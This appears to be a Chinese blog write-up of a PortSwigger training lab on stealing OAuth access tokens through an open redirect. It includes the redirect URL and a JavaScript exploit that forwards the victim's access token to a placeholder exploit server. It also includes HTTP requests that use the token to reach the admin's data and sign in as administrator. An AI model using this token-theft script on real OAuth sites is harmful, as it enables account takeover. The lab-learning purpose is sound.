某不知名博客 某不知名博客
首页
  • 《vulcat文档》
  • Web安全

    • 《BurpSuite及官方实验室》
    • 《OSWE学习历程》
  • 云原生安全

    • 《Docker命令大全》
    • 《CKS考试学习指南》
    • 《旧-Kubernetes教程》
漏洞库
  • 《渗透工具大全》
  • 《云安全》
事件库
关于
  • 分类
  • 标签
  • 归档
GitHub (opens new window)

Carsaid

安全界的小学生
首页
  • 《vulcat文档》
  • Web安全

    • 《BurpSuite及官方实验室》
    • 《OSWE学习历程》
  • 云原生安全

    • 《Docker命令大全》
    • 《CKS考试学习指南》
    • 《旧-Kubernetes教程》
漏洞库
  • 《渗透工具大全》
  • 《云安全》
事件库
关于
  • 分类
  • 标签
  • 归档
GitHub (opens new window)
  • 前言

  • 服务器端主题(翻译)

  • 客户端主题(翻译)

  • 高级主题(翻译)

  • 扩展阅读(翻译)

  • 个人学习笔记

  • 实验室做题记录

    • 实验室做题记录
    • 服务器端

    • 客户端

    • 高级主题

      • 不安全的反序列化

      • GraphQL API漏洞

      • 服务端模板注入

      • Web缓存投毒

      • HTTP主机头攻击

      • HTTP请求走私

      • OAuth身份验证漏洞

        • 学徒-程序实现漏洞-隐式授权模式的不当实现
        • 从业者-程序实现漏洞-CSRF防护缺陷
        • 从业者-OAuth服务漏洞-授权码和访问令牌泄露
        • 从业者-OAuth服务漏洞-通过开放重定向窃取访问令牌
          • 题目
          • 实操
            • 实后娱乐
        • 专家-OAuth服务漏洞-通过代理页面窃取访问令牌
        • 从业者-OpenID动态客户端注册-二阶SSRF
      • JWT攻击

      • 原型链污染

  • BurpSuite及官方实验室
  • 实验室做题记录
  • 高级主题
  • OAuth身份验证漏洞
carsaid
2024-02-08
目录

从业者-OAuth服务漏洞-通过开放重定向窃取访问令牌

# 实验室:通过开放重定向窃取OAuth访问令牌

# 题目

此实验室使用 OAuth 服务,允许用户使用其社交媒体帐户登录。由于 OAuth 服务存在验证缺陷,导致攻击者有可能将访问令牌泄露到客户端应用程序上的任意页面。

若要解决实验室问题,请在博客网站上识别一个开放重定向,并使用它来窃取管理员用户的帐户访问令牌。使用访问令牌获取管理员的 API 密钥,并使用实验室横幅中提供的按钮提交解决方案。

笔记

登录管理员的帐户之后,你无法直接访问其 API 密钥。

管理员用户将打开你从漏洞利用服务器发送的任何内容,并且他们始终与 OAuth 服务保持活动会话。

你可以使用以下凭据登录到自己的社交媒体帐户:wiener:peter。

实验室-从业者

通过开放重定向窃取OAuth访问令牌 >>

- name: 实验室-从业者
  desc: 通过开放重定向窃取OAuth访问令牌 >>
  avatar: https://fastly.statically.io/gh/clincat/blog-imgs@main/vuepress/static/imgs/docs/burpsuite-learn/public/lab-logo.png
  link: https://portswigger.net/web-security/oauth/lab-oauth-stealing-oauth-access-tokens-via-an-open-redirect
  bgColor: '#001350'
  textColor: '#4cc1ff'
1
2
3
4
5
6

# 实操

(目前只有图,文字后面有时间补)

点击 “ACCESS THE LAB” 进入实验室。

Not Found Image Not Found Image Not Found Image Not Found Image Not Found Image Not Found Image Not Found Image Not Found Image Not Found Image Not Found Image Not Found Image Not Found Image Not Found Image Not Found Image Not Found Image Not Found Image
/oauth-callback/../post/next?path=https://<漏洞利用服务器>/exploit
1
Not Found Image
<script>
    const urlSearchParams = new URLSearchParams(window.location.hash.substr(1));
    const token = urlSearchParams.get('access_token');

    if (token == null) {
        window.location = "https://<OAuth服务器>/auth?client_id=sdq9z6a7bpvop5mz4vweg&redirect_uri=https://<受害域>/oauth-callback/../post/next?path=https://<漏洞利用服务器>/exploit&response_type=token&nonce=-1137724620&scope=openid%20profile%20email"
    } else {
        fetch('https://<漏洞利用服务器>/me?attack=' + token)
    }
</script>
1
2
3
4
5
6
7
8
9
10
Not Found Image Not Found Image Not Found Image

qwDhBynbW9wC4wPUNZNKP-yjX1vcyp6-FNGiemqMvkv Not Found Image

GET /me HTTP/2
Host: <OAuth服务器>
Authorization: Bearer <访问令牌>
Content-Type: application/json


1
2
3
4
5
6

uQufrxVOCOeFOxcBmrslSbqlaVkSxBLU

Not Found Image Not Found Image Not Found Image

# 实后娱乐

POST /authenticate HTTP/2
Host: <受害域>
Content-Type: application/json
Content-Length: 122

{"email":"administrator@normal-user.net","username":"administrator","token":"<访问令牌>"}
1
2
3
4
5
6
Not Found Image Not Found Image
编辑 (opens new window)
从业者-OAuth服务漏洞-授权码和访问令牌泄露
专家-OAuth服务漏洞-通过代理页面窃取访问令牌

← 从业者-OAuth服务漏洞-授权码和访问令牌泄露 专家-OAuth服务漏洞-通过代理页面窃取访问令牌→

最近更新
01
API测试笔记
04-30
02
msfvenom
03-29
03
Metasploit
03-29
更多文章>
Theme by Vdoing | Copyright © 2023-2024 Carsaid | MIT License
  • 跟随系统
  • 浅色模式
  • 深色模式
  • 阅读模式